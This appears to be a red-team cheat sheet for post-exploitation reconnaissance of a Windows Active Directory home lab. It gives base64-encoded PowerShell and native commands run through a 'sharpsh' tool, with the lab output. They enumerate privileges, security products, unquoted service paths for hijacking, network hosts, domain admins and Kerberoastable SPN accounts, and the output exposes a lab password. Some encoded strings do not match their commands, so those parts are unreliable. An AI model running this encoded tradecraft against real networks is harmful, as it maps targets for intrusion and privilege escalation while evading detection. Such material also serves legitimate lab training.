BASE64 ENCODING
Example 1:
cat <<'CMD' | base64 -w 0
<$COMMAND>
CMDOr if having issues, try:
Example 2:
cat <<'CMD' | iconv -t UTF-16LE | base64 -w 0
<$COMMAND>"
CMDINITIAL ENUMERATION
Check OS version
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_OperatingSystem | Select-Object Caption, Version, BuildNumber, OSArchitecture
CMDsharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0LU9iamVjdCBDYXB0aW9uLCBWZXJzaW9uLCBCdWlsZE51bWJlciwgT1NBcmNoaXRlY3R1cmUK'Caption Version BuildNumber OSArchitecture
------- ------- ----------- --------------
Microsoft Windows Server 2019 Datacenter Evaluation 10.0.17763 17763 64-bit
Check for domain
cat <<'CMD' | base64 -w 0
(Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain
CMDsharpsh -t 20 -- '-e -c KEdldC1XbWlPYmplY3QgLUNsYXNzIFdpbjMyX0NvbXB1dGVyU3lzdGVtKS5QYXJ0T2ZEb21haW4K'True
If True, get the domain name
cat <<'CMD' | base64 -w 0
(Get-WmiObject -Class Win32_ComputerSystem).Domain
CMDsharpsh -t 20 -- '-e -c KEdldC1XbWlPYmplY3QgLUNsYXNzIFdpbjMyX0NvbXB1dGVyU3lzdGVtKS5Eb21haW4K'north.sevenkingdoms.local
whoami
cat <<'CMD' | base64 -w 0
whoami /all
CMDsharpsh -t 20 -- '-e -c d2hvYW1pIC9hbGwK'User Name SID
================ ===
north\robb.stark S-1-5-21-3025714217-3891194231-...
Privilege Name Description State
=============================
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
List all local users
cat <<'CMD' | base64 -w 0
Get-LocalUser | Select-Object Name, Enabled, LastLogon, PasswordLastSet
CMDsharpsh -t 20 -- '-e -c R2V0LUxvY2FsVXNlciB8IFNlbGVjdC1PYmplY3QgTmFtZSwgRW5hYmxlZCwgTGFzdExvZ29uLCBQYXNzd29yZExhc3RTZXQK'Name Enabled
---- -------
Administrator True
DefaultAccount False
Guest True
List local administrators group
cat <<'CMD' | base64 -w 0
Get-LocalGroupMember -Group 'Administrators'
CMDsharpsh -t 20 -- '-e -c R2V0LUxvY2FsR3JvdXBNZW1iZXIgLUdyb3VwICdBZG1pbmlzdHJhdG9ycycK'ObjectClass Name PrincipalSource
----------- ---- ---------------
User CASTELBLACK\Administrator Local
User CASTELBLACK\vagrant Local
Group NORTH\Domain Admins ActiveDirectory
User NORTH\jeor.mormont ActiveDirectory
List all running processes
cat <<'CMD' | base64 -w 0
Get-Process | Select-Object ProcessName, Id, Path | Sort-Object ProcessName
CMDsharpsh -t 20 -- '-e -c R2V0LVByb2Nlc3MgfCBTZWxlY3QtT2JqZWN0IFByb2Nlc3NOYW1lLCBJZCwgUGF0aCB8IFNvcnQtT2JqZWN0IFByb2Nlc3NOYW1lCg=='ProcessName Id Path
----------- -- ----
conhost 3648
conhost 2728 C:\Windows\system32\conhost.exe
csrss 492
...
List services running as SYSTEM
echo -n 'Get-WmiObject win32_service | Where-Object {$_.StartName -eq "LocalSystem"} | Select-Object Name, PathName, State, StartMode' | base64 -w 0sharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCB3aW4zMl9zZXJ2aWNlIHwgV2hlcmUtT2JqZWN0IHskXy5TdGFydE5hbWUgLWVxICJMb2NhbFN5c3RlbSJ9IHwgU2VsZWN0LU9iamVjdCBOYW1lLCBQYXRoTmFtZSwgU3RhdGUsIFN0YXJ0TW9kZQ=='Name PathName
---- --------
AppHostSvc C:\Windows\system32\svchost.exe -k apphost
Appinfo C:\Windows\system32\svchost.exe -k netsvcs -p
AppMgmt C:\Windows\system32\svchost.exe -k netsvcs -p
...
List unquoted service paths
cat <<'CMD' | base64 -w 0
Get-WmiObject win32_service | Where-Object { $_.PathName -notlike '"*' -and $_.PathName -like '* *' } | Select-Object Name, PathName, StartName, State
CMDsharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCB3aW4zMl9zZXJ2aWNlIHwgV2hlcmUtT2JqZWN0IHsgJF8uUGF0aE5hbWUgLW5vdGxpa2UgJyIqJyAtYW5kICRfLlBhdGhOYW1lIC1saWtlICcqIConIH0gfCBTZWxlY3QtT2JqZWN0IE5hbWUsIFBhdGhOYW1lLCBTdGFydE5hbWUsIFN0YXRlCg=='Name : VulnerableService PathName : C:\Program Files\Company App\Service.exe StartName: LocalSystem State : Running
Try malicious “Company.exe” for example
NETWORK RECONNAISSANCE
List basic network configuration
cat <<'CMD' | base64 -w 0
Get-NetIPConfiguration
CMDsharpsh -t 20 -- '-e -c R2V0LU5ldElQQ29uZmlndXJhdGlvbgo='InterfaceAlias : Ethernet1
IPv4Address : 192.168.56.22
IPv6DefaultGateway :
IPv4DefaultGateway :
DNSServer : 192.168.56.11
List established network connections
cat <<'CMD' | base64 -w 0
Get-NetTCPConnection | Where-Object {$_.State -eq "Established"} | Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess | Sort-Object RemoteAddress
CMDsharpsh -t 20 -- '-e -c R2V0LU5ldFRDUENvbm5lY3Rpb24gfCBXaGVyZS1PYmplY3QgeyRfLlN0YXRlIC1lcSAiRXN0YWJsaXNoZWQifSB8IFNlbGVjdC1PYmplY3QgTG9jYWxBZGRyZXNzLCBMb2NhbFBvcnQsIFJlbW90ZUFkZHJlc3MsIFJlbW90ZVBvcnQsIE93bmluZ1Byb2Nlc3MgfCBTb3J0LU9iamVjdCBSZW1vdGVBZGRyZXNzCg=='LocalAddress : 192.168.56.22 LocalPort : 52376 RemoteAddress : 192.168.56.134 RemotePort : 8088 OwningProcess : 6980
List arp cache – 1
cat <<'CMD' | base64 -w 0
Get-NetNeighbor | Where-Object {$_.State -ne "Unreachable" -and $_.State -ne "Incomplete"} | Select-Object IPAddress, LinkLayerAddress, State
CMDsharpsh -t 20 -- '-e -c R2V0LU5ldE5laWdoYm9yIHwgV2hlcmUtT2JqZWN0IHskXy5TdGF0ZSAtbmUgIlVucmVhY2hhYmxlIiAtYW5kICRfLlN0YXRlIC1uZSAiSW5jb21wbGV0ZSJ9IHwgU2VsZWN0LU9iamVjdCBJUEFkZHJlc3MsIExpbmtMYXllckFkZHJlc3MsIFN0YXRlCg=='192.168.56.134 00-0C-29-19-4E-3D Reachable 192.168.56.11 00-0C-29-92-D6-8B Reachable 192.168.56.1 00-50-56-C0-00-02 Reachable
List arp cache – 2
cat <<'CMD' | base64 -w 0
arp -a | sls '^\s*(\d{1,3}(\.\d{1,3}){3})\s+([0-9a-f-]{17})' | % { $ip=$_.Matches[0].Groups[1].Value;$mac=$_.Matches[0].Groups[3].Value;$hn=try{[System.Net.Dns]::GetHostEntry($ip).HostName}catch{$null};[pscustomobject]@{IPAddress=$ip;MACAddress=$mac;Hostname=$hn} } | sort IPAddress
CMDsharpsh -i -t 20 -- '-e -c YXJwIC1hIHwgc2xzICdeXHMqKFxkezEsM30oXC5cZHsxLDN9KXszfSlccysoWzAtOWEtZi1dezE3fSknIHwgJSB7ICRpcD0kXy5NYXRjaGVzWzBdLkdyb3Vwc1sxXS5WYWx1ZTskbWFjPSRfLk1hdGNoZXNbMF0uR3JvdXBzWzNdLlZhbHVlOyRobj10cnl7W1N5c3RlbS5OZXQuRG5zXTo6R2V0SG9zdEVudHJ5KCRpcCkuSG9zdE5hbWV9Y2F0Y2h7JG51bGx9O1twc2N1c3RvbW9iamVjdF1Ae0lQQWRkcmVzcz0kaXA7TUFDQWRkcmVzcz0kbWFjO0hvc3RuYW1lPSRobn0gfSB8IHNvcnQgSVBBZGRyZXNzCg=='IPAddress MACAddress Hostname
--------- ---------- --------
192.168.56.10 00-0c-29-eb-f3-6b kingslanding...
192.168.56.11 00-0c-29-92-d6-8b winterfell....
...
Ping sweep subnet
cat <<'CMD' | base64 -w 0
1..254 | ForEach-Object { $ip = "192.168.56.$_" if (Test-Connection -ComputerName $ip -Count 1 -Quiet -TimeoutSeconds 1) { Write-Output "$ip is alive" } }
CMDsharpsh -t 60 -- '-e -c R2V0LU5ldE5laWdoYm9yIHwgV2hlcmUtT2JqZWN0IHskXy5TdGF0ZSAtbmUgIlVucmVhY2hhYmxlIiAtYW5kICRfLlN0YXRlIC1uZSAiSW5jb21wbGV0ZSJ9IHwgU2VsZWN0LU9iamVjdCBJUEFkZHJlc3MsIExpbmtMYXllckFkZHJlc3MsIFN0YXRlCg=='192.168.56.100 00-0C-29-67-33-F1 Reachable
192.168.56.11 00-0C-29-9D-F2-E4 Stale
192.168.56.10 00-0C-29-3A-3A-7B Stale
192.168.56.1 00-50-56-C0-00-01 Reachable
List installed software (64-bit)
cat <<'CMD' | base64 -w 0
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Where-Object {$_.DisplayName -ne $null}
CMDsharpsh -i -t 20 -- '-e -c R2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxVbmluc3RhbGxcKiB8IFNlbGVjdC1PYmplY3QgRGlzcGxheU5hbWUsIERpc3BsYXlWZXJzaW9uLCBQdWJsaXNoZXIsIEluc3RhbGxEYXRlIHwgV2hlcmUtT2JqZWN0IHskXy5EaXNwbGF5TmFtZSAtbmUgJG51bGx9Cg=='DisplayName DisplayVersion Publisher
----------- -------------- ---------
7-Zip 25.01 (x64) 25.01 Igor Pavlov
Microsoft SQL Server 2019 (64-bit)
Microsoft SQL Server 2019 (64-bit) Microsoft
...
List 32-bit installed software on 64-bit systems
cat <<'CMD' | base64 -w 0
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Where-Object {$_.DisplayName -ne $null}
CMDsharpsh -i -t 20 -- '-e -c R2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxVbmluc3RhbGxcKiB8IFNlbGVjdC1PYmplY3QgRGlzcGxheU5hbWUsIERpc3BsYXlWZXJzaW9uLCBQdWJsaXNoZXIsIEluc3RhbGxEYXRlIHwgV2hlcmUtT2JqZWN0IHskXy5EaXNwbGF5TmFtZSAtbmUgJG51bGx9Cg=='DisplayName DisplayVersion Publisher
----------- -------------- ---------
7-Zip 25.01 (x64) 25.01 Igor Pavlov
Microsoft SQL Server 2019 (64-bit)
Microsoft SQL Server 2019 (64-bit) Microsoft
...
List security products
cat <<'CMD' | base64 -w 0
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct | Select-Object displayName, pathToSignedProductExe, productState
CMDsharpsh -i -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtTmFtZXNwYWNlIHJvb3RcU2VjdXJpdHlDZW50ZXIyIC1DbGFzcyBBbnRpVmlydXNQcm9kdWN0IHwgU2VsZWN0LU9iamVjdCBkaXNwbGF5TmFtZSwgcGF0aFRvU2lnbmVkUHJvZHVjdEV4ZSwgcHJvZHVjdFN0YXRlCg=='displayName pathToSignedProductExe productState ----------- ---------------------- ------------ Windows Defender windowsdefender:// 397568
ACTIVE DIRECTORY
Installation
Some commands below will only work with the Active Directory PowerShell module installed. With fun tricks out there to get this module, as this in a local home lab, it was just a matter of installing it through PowerShell as seen below:
Windows 10 / 11
PowerShell (Admin)
# Install RSAT AD module
Add-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
# Verify
Get-Module -ListAvailable ActiveDirectory
DISM (Admin) alternative
DISM /Online /Add-Capability /CapabilityName:Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
Windows Server
Server 2016 / 2019 / 2022 (PowerShell)
# Install RSAT AD module
Install-WindowsFeature RSAT-AD-PowerShell
# Verify
Get-Module -ListAvailable ActiveDirectory
Server 2012 R2 / 2012 (PowerShell)
# Install RSAT AD module
Add-WindowsFeature RSAT-AD-PowerShellImport + quick test
Import-Module ActiveDirectory
Get-Command Get-ADUserList current domain information
cat <<'CMD' | base64 -w 0
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
CMDsharpsh -i -t 20 -- '-e -c W1N5c3RlbS5EaXJlY3RvcnlTZXJ2aWNlcy5BY3RpdmVEaXJlY3RvcnkuRG9tYWluXTo6R2V0Q3VycmVudERvbWFpbigpCg=='Forest : sevenkingdoms.local
DomainControllers : {winterfell...}
Children : {}
DomainMode : Unknown
DomainModeLevel : 7
Parent : sevenkingdoms.local
PdcRoleOwner : winterfell.north.sevenkingdoms.local
RidRoleOwner : winterfell.north.sevenkingdoms.local
...
List all domain controllers
cat <<'CMD' | base64 -w 0
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | Select-Object Name, IPAddress, OSVersion
CMDsharpsh -t 20 -- '-e -c W1N5c3RlbS5EaXJlY3RvcnlTZXJ2aWNlcy5BY3RpdmVEaXJlY3RvcnkuRG9tYWluXTo6R2V0Q3VycmVudERvbWFpbigpLkRvbWFpbkNvbnRyb2xsZXJzIHwgU2VsZWN0LU9iamVjdCBOYW1lLCBJUEFkZHJlc3MsIE9TVmVyc2lvbgo='Name IPAddress OSVersion
---- --------- ---------
winterfell 192.168.56.11 Windows Server 2019
List all users in the domain
cat <<'CMD' | base64 -w 0
Get-ADUser -Filter * -Properties * | Select-Object Name, SamAccountName, Enabled, LastLogonDate, PasswordLastSet, whenCreated, AdminCount
CMDsharpsh -t 20 -- '-e -c R2V0LUFEVXNlciAtRmlsdGVyICogLVByb3BlcnRpZXMgKiB8IFNlbGVjdC1PYmplY3QgTmFtZSwgU2FtQWNjb3VudE5hbWUsIEVuYWJsZWQsIExhc3RMb2dvbkRhdGUsIFBhc3N3b3JkTGFzdFNldCwgd2hlbkNyZWF0ZWQsIEFkbWluQ291bnQK'... Name : eddard.stark SamAccountName : eddard.stark Enabled : True LastLogonDate : 1/11/2026 7:41:26 AM PasswordLastSet : 11/22/2025 11:13:29 AM whenCreated : 11/22/2025 11:13:29 AM AdminCount : 1 Name : catelyn.stark SamAccountName : catelyn.stark Enabled : True LastLogonDate : PasswordLastSet : 11/22/2025 11:13:33 AM whenCreated : 11/22/2025 11:13:33 AM AdminCount : 1 Name : jeor.mormont SamAccountName : jeor.mormont Enabled : True LastLogonDate : 1/11/2026 7:37:04 AM PasswordLastSet : 11/22/2025 11:13:36 AM whenCreated : 11/22/2025 11:13:36 AM AdminCount : 1 ...
List AD users with Description fields
cat <<'CMD' | base64 -w 0
Get-ADUser -Filter * -Properties Description | Select-Object SamAccountName, Enabled, Description
CMDsharpsh -t 20 -- '-e -c R2V0LUFEVXNlciAtRmlsdGVyICogLVByb3BlcnRpZXMgRGVzY3JpcHRpb24gfCBTZWxlY3QtT2JqZWN0IFNhbUFjY291bnROYW1lLCBFbmFibGVkLCBEZXNjcmlwdGlvbgo='SamAccountName Enabled Description
-------------- ------- -----------
hodor True Brainless Giant
jon.snow True Jon Snow
samwell.tarly True Samwell Tarly(Password:Heartsbane)
jeor.mormont True Jeor Mormont
sql_svc True sql service
List domain administrators
cat <<'CMD' | base64 -w 0
Get-ADGroupMember -Identity "Domain Admins" -Recursive | Select-Object Name, SamAccountName, objectClass
CMDsharpsh -t 20 -- '-e -c R2V0LUFER3JvdXBNZW1iZXIgLUlkZW50aXR5ICJEb21haW4gQWRtaW5zIiAtUmVjdXJzaXZlIHwgU2VsZWN0LU9iamVjdCBOYW1lLCBTYW1BY2NvdW50TmFtZSwgb2JqZWN0Q2xhc3MK'Name SamAccountName objectClass ---- -------------- ----------- Administrator Administrator user eddard.stark eddard.stark user
List all computers in the domain
cat <<'CMD' | base64 -w 0
Get-ADComputer -Filter * -Properties * | Select-Object Name, OperatingSystem, OperatingSystemVersion, LastLogonDate, IPv4Address
CMDsharpsh -t 20 -- '-e -c R2V0LUFEQ29tcHV0ZXIgLUZpbHRlciAqIC1Qcm9wZXJ0aWVzICogfCBTZWxlY3QtT2JqZWN0IE5hbWUsIE9wZXJhdGluZ1N5c3RlbSwgT3BlcmF0aW5nU3lzdGVtVmVyc2lvbiwgTGFzdExvZ29uRGF0ZSwgSVB2NEFkZHJlc3MK'Name : WINTERFELL
OperatingSystem : Windows Server 2019
OperatingSystemVersion : 10.0 (17763)
LastLogonDate : 1/11/2026 7:37:01 AM
IPv4Address : 192.168.56.11
Name : CASTELBLACK
OperatingSystem : Windows Server 2019
OperatingSystemVersion : 10.0 (17763)
LastLogonDate : 1/11/2026 7:37:03 AM
IPv4Address : 192.168.56.22
cat <<'CMD' | iconv -t UTF-16LE | base64 -w 0
Get-ADComputer -Filter * -Properties dnsHostName | Select -Expand dnsHostName | ForEach-Object { $h=$_; $o=net view \\$h 2>$null; if($LASTEXITCODE-ne0 -or -not $o){return}; ($o -split "`n")|Select-String '^\s*(\S+)\s+(Disk|Print|IPC)\s+(.*)$'|ForEach-Object{$m=$_.Matches[0].Groups;[pscustomobject]@{Host=$h;Share=$m[1].Value;Type=$m[2].Value;Comment=$m[3].Value.Trim()}} } | Format-Table -AutoSize
CMDsharpsh -i -t 20 -- '-e -c 'List AD users using ADSI
cat <<'CMD' | base64 -w 0
$searcher=[ADSISearcher]"(objectClass=user)";$null=$searcher.PropertiesToLoad.AddRange(@("samaccountname","displayname","mail"));$searcher.FindAll()|ForEach-Object{[PSCustomObject]@{Username=$_.Properties['samaccountname'][0];DisplayName=$_.Properties['displayname'][0];Email=$_.Properties['mail'][0]}}
CMDsharpsh -i -t 20 -- '-e -c JHNlYXJjaGVyPVtBRFNJU2VhcmNoZXJdIihvYmplY3RDbGFzcz11c2VyKSI7JG51bGw9JHNlYXJjaGVyLlByb3BlcnRpZXNUb0xvYWQuQWRkUmFuZ2UoQCgic2FtYWNjb3VudG5hbWUiLCJkaXNwbGF5bmFtZSIsIm1haWwiKSk7JHNlYXJjaGVyLkZpbmRBbGwoKXxGb3JFYWNoLU9iamVjdHtbUFNDdXN0b21PYmplY3RdQHtVc2VybmFtZT0kXy5Qcm9wZXJ0aWVzWydzYW1hY2NvdW50bmFtZSddWzBdO0Rpc3BsYXlOYW1lPSRfLlByb3BlcnRpZXNbJ2Rpc3BsYXluYW1lJ11bMF07RW1haWw9JF8uUHJvcGVydGllc1snbWFpbCddWzBdfX0K'Username DisplayName Email -------- ----------- ----- Administrator Guest vagrant Vagrant WINTERFELL$ krbtgt SEVENKINGDOMS$ CASTELBLACK$ arya.stark eddard.stark catelyn.stark jeor.mormont sansa.stark brandon.stark rickon.stark hodor jon.snow samwell.tarly jeor.mor
cat <<'CMD' | base64 -w 0
$searcher=[ADSISearcher]"(memberOf:1.2.840.113556.1.4.1941:=CN=Domain Admins,CN=Users,DC=corp,DC=local)"; $searcher.FindAll() | ForEach-Object { $_.Properties['samaccountname'][0] }
CMDsharpsh -t 20 -- '-e -c JHNlYXJjaGVyPVtBRFNJU2VhcmNoZXJdIihtZW1iZXJPZjoxLjIuODQwLjExMzU1Ni4xLjQuMTk0MTo9Q049RG9tYWluIEFkbWlucyxDTj1Vc2VycyxEQz1jb3JwLERDPWxvY2FsKSI7ICRzZWFyY2hlci5GaW5kQWxsKCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfLlByb3BlcnRpZXNbJ3NhbWFjY291bnRuYW1lJ11bMF0gfQo='List all computers using ADSI
cat <<'CMD' | base64 -w 0
$searcher=[ADSISearcher]"(objectClass=computer)";$null=$searcher.PropertiesToLoad.AddRange(@("name","operatingsystem","operatingsystemversion"));$searcher.FindAll()|ForEach-Object{[PSCustomObject]@{Name=$_.Properties['name'][0];OS=$_.Properties['operatingsystem'][0];Version=$_.Properties['operatingsystemversion'][0]}}
CMDsharpsh -i -t 20 -- '-e -c JHNlYXJjaGVyPVtBRFNJU2VhcmNoZXJdIihvYmplY3RDbGFzcz1jb21wdXRlcikiOyRudWxsPSRzZWFyY2hlci5Qcm9wZXJ0aWVzVG9Mb2FkLkFkZFJhbmdlKEAoIm5hbWUiLCJvcGVyYXRpbmdzeXN0ZW0iLCJvcGVyYXRpbmdzeXN0ZW12ZXJzaW9uIikpOyRzZWFyY2hlci5GaW5kQWxsKCl8Rm9yRWFjaC1PYmplY3R7W1BTQ3VzdG9tT2JqZWN0XUB7TmFtZT0kXy5Qcm9wZXJ0aWVzWyduYW1lJ11bMF07T1M9JF8uUHJvcGVydGllc1snb3BlcmF0aW5nc3lzdGVtJ11bMF07VmVyc2lvbj0kXy5Qcm9wZXJ0aWVzWydvcGVyYXRpbmdzeXN0ZW12ZXJzaW9uJ11bMF19fQo='Name OS Version
---- -- -----
WINTERFELL Windows Server 2019 10.0 (17763)
CASTELBLACK Windows Server 2019 10.0 (17763)
List users w/ never expire passwords using ADSI
cat <<'CMD' | base64 -w 0
$searcher = [ADSISearcher]"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))";$searcher.FindAll() | ForEach-Object {$_.Properties['samaccountname']}
CMDsharpsh -i -t 20 -- '-e -c JHNlYXJjaGVyID0gW0FEU0lTZWFyY2hlcl0iKCYob2JqZWN0Q2xhc3M9dXNlcikodXNlckFjY291bnRDb250cm9sOjEuMi44NDAuMTEzNTU2LjEuNC44MDM6PTY1NTM2KSkiOyRzZWFyY2hlci5GaW5kQWxsKCkgfCBGb3JFYWNoLU9iamVjdCB7JF8uUHJvcGVydGllc1snc2FtYWNjb3VudG5hbWUnXX0K'Administrator Guest vagrant arya.stark eddard.stark catelyn.stark jeor.mormont sansa.stark brandon.stark rickon.stark hodor jon.snow samwell.tarly jeor.mormont sql_svc
List users w/ password note required using ADSI
cat <<'CMD' | base64 -w 0
$searcher = [ADSISearcher]"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))"; $searcher.FindAll() | ForEach-Object { $_.Properties['samaccountname']}
CMDsharpsh -i -t 20 -- '-e -c JHNlYXJjaGVyID0gW0FEU0lTZWFyY2hlcl0iKCYob2JqZWN0Q2xhc3M9dXNlcikodXNlckFjY291bnRDb250cm9sOjEuMi44NDAuMTEzNTU2LjEuNC44MDM6PTMyKSkiOyAkc2VhcmNoZXIuRmluZEFsbCgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXy5Qcm9wZXJ0aWVzWydzYW1hY2NvdW50bmFtZSddfQo='Guest SEVENKINGDOMS$
Find accounts w/ SPNs usind ADSI
cat <<'CMD' | base64 -w 0
$searcher=[ADSISearcher]"(servicePrincipalName=*)";$null=$searcher.PropertiesToLoad.AddRange(@("samaccountname","serviceprincipalname"));$searcher.FindAll()|%{[PSCustomObject]@{Username=$_.Properties['samaccountname'][0];SPN=$_.Properties['serviceprincipalname'][0]}}
CMDsharpsh -i -t 20 -- '-e -c JHNlYXJjaGVyPVtBRFNJU2VhcmNoZXJdIihzZXJ2aWNlUHJpbmNpcGFsTmFtZT0qKSI7JG51bGw9JHNlYXJjaGVyLlByb3BlcnRpZXNUb0xvYWQuQWRkUmFuZ2UoQCgic2FtYWNjb3VudG5hbWUiLCJzZXJ2aWNlcHJpbmNpcGFsbmFtZSIpKTskc2VhcmNoZXIuRmluZEFsbCgpfCV7W1BTQ3VzdG9tT2JqZWN0XUB7VXNlcm5hbWU9JF8uUHJvcGVydGllc1snc2FtYWNjb3VudG5hbWUnXVswXTtTUE49JF8uUHJvcGVydGllc1snc2VydmljZXByaW5jaXBhbG5hbWUnXVswXX19Cg=='Username SPN
-------- ---
jon.snow CIFS/thewall.north.sevenkingdoms.local
CASTELBLACK$ HTTP/winterfell.north.sevenkingdoms.local
sansa.stark HTTP/eyrie.north.sevenkingdoms.local
krbtgt kadmin/changepw
sql_svc MSSQLSvc/castelblack.north.sevenkingdoms.local
ACTIVE DIRECTORY – NATIVE TOOLS
List domain controllers
cat <<'CMD' | base64 -w 0
nltest /dclist:north.sevenkingdoms.local
CMDsharpsh -t 20 -- '-e -c bmx0ZXN0IC9kY2xpc3Q6bm9ydGguc2V2ZW5raW5nZG9tcy5sb2NhbAo='
Get list of DCs in domain 'north.sevenkingdoms.local' from '\\winterfell.north.sevenkingdoms.local'.
winterfell.north.sevenkingdoms.local [PDC] [DS] Site: Default-First-Site-Name
List domain trusts
cat <<'CMD' | base64 -w 0
nltest /domain_trusts
CMDsharpsh -t 20 -- '-e -c bmx0ZXN0IC9kb21haW5fdHJ1c3RzCg=='
List of domain trusts:
0: SEVENKINGDOMS sevenkingdoms.local (NT 5) (Forest Tree Root) (Direct Outbound) (Direct Inbound) ( Attr: withinforest )
1: NORTH north.sevenkingdoms.local (NT 5) (Forest: 0) (Primary Domain) (Native)
List all trusts
cat <<'CMD' | base64 -w 0
nltest /domain_trusts /all_trusts
CMDsharpsh -t 20 -- '-e -c bmx0ZXN0IC9kb21haW5fdHJ1c3RzIC9hbGxfdHJ1c3RzCg=='
List of domain trusts:
0: SEVENKINGDOMS sevenkingdoms.local (NT 5) (Forest Tree Root) (Direct Outbound) (Direct Inbound) ( Attr: withinforest )
1: NORTH north.sevenkingdoms.local (NT 5) (Forest: 0) (Primary Domain) (Native)
List domain controller info
cat <<'CMD' | base64 -w 0
nltest /dsgetdc:north.sevenkingdoms.local
CMDsharpsh -t 20 -- '-e -c bmx0ZXN0IC9kc2dldGRjOm5vcnRoLnNldmVua2luZ2RvbXMubG9jYWwK'DC: \\winterfell.north.sevenkingdoms.local Address: \\192.168.56.11 Dom Guid: 9e1ed7bc-2169-4ff6-a96e-71037cac7d5c Dom Name: north.sevenkingdoms.local Forest Name: sevenkingdoms.local Dc Site Name: Default-First-Site-Name Our Site Name: Default-First-Site-Name Flags: PDC GC DS LDAP KDC TIMESERV WRITABLE DNS_DC DNS_DOMAIN DNS_FOREST CLOSE_SITE FULL_SECRET WS DS_8 DS_9 DS_10 0x20000
List current domain and site
cat <<'CMD' | base64 -w 0
nltest /dsgetsite
CMDsharpsh -t 20 -- '-e -c bmx0ZXN0IC9kc2dldHNpdGUK'Default-First-Site-Name
List domain information
cat <<'CMD' | base64 -w 0
nltest /dcname:north.sevenkingdoms.local
CMDsharpsh -t 20 -- '-e -c bmx0ZXN0IC9kY25hbWU6bm9ydGguc2V2ZW5raW5nZG9tcy5sb2NhbAo='NetGetDCName failed: Status = 2453 0x995 NERR_DCNotFound
ACTIVE DIRECTORY – DSQUERY
Installation
Requires elevated privs:
cat <<'CMD' | base64 -w 0
Add-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
CMDsharpsh -t 20 -- '-e -c QWRkLVdpbmRvd3NDYXBhYmlsaXR5IC1PbmxpbmUgLU5hbWUgUnNhdC5BY3RpdmVEaXJlY3RvcnkuRFMtTERTLlRvb2xzfn5+fjAuMC4xLjAK'Or if you have GUI access and privileges:
- Open Server Manager
- Navigate to Manage > Add Roles and Features
- Proceed to Features
- Expand Remote Server Administration Tools
- Navigate to Role Administration Tools
- Select AD DS and AD LDS Tools
- Install
List all users in the domain
cat <<'CMD' | base64 -w 0
dsquery user -limit 0
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSB1c2VyIC1saW1pdCAwCg=='"CN=Administrator,CN=Users,DC=north,DC=sevenkingdoms"
"CN=krbtgt,CN=Users,DC=north,DC=sevenkingdoms"
"CN=SEVENKINGDOMS$,CN=Users,DC=north,DC=sevenkingdoms"
"CN=arya.stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=eddard.stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=catelyn.stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=robb.stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=sansa.stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=brandon.stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=rickon.stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=hodor,CN=Users,DC=north,DC=sevenkingdoms"
"CN=jon.snow,CN=Users,DC=north,DC=sevenkingdoms"
"CN=samwell.tarly,CN=Users,DC=north,DC=sevenkingdoms"
"CN=jeor.mormont,CN=Users,DC=north,DC=sevenkingdoms"
"CN=sql_svc,CN=Users,DC=north,DC=sevenkingdoms"
List all computers
cat <<'CMD' | base64 -w 0
dsquery computer -limit 0
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSBjb21wdXRlciAtbGltaXQgMAo='"CN=WINTERFELL,OU=Domain Controllers,DC=north,DC=sevenkingdoms,DC=local"
"CN=CASTELBLACK,CN=Computers,DC=north,DC=sevenkingdoms,DC=local"
List all groups
cat <<'CMD' | base64 -w 0
dsquery group -limit 0
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSBncm91cCAtbGltaXQgMAo='"CN=Administrators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Users,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Guests,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Print Operators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Backup Operators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Replicator,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Remote Desktop Users,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Network Configuration Operators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Performance Monitor Users,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Performance Log Users,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Distributed COM Users,CN=Builtin,DC=north,DC=sevenkingdoms"
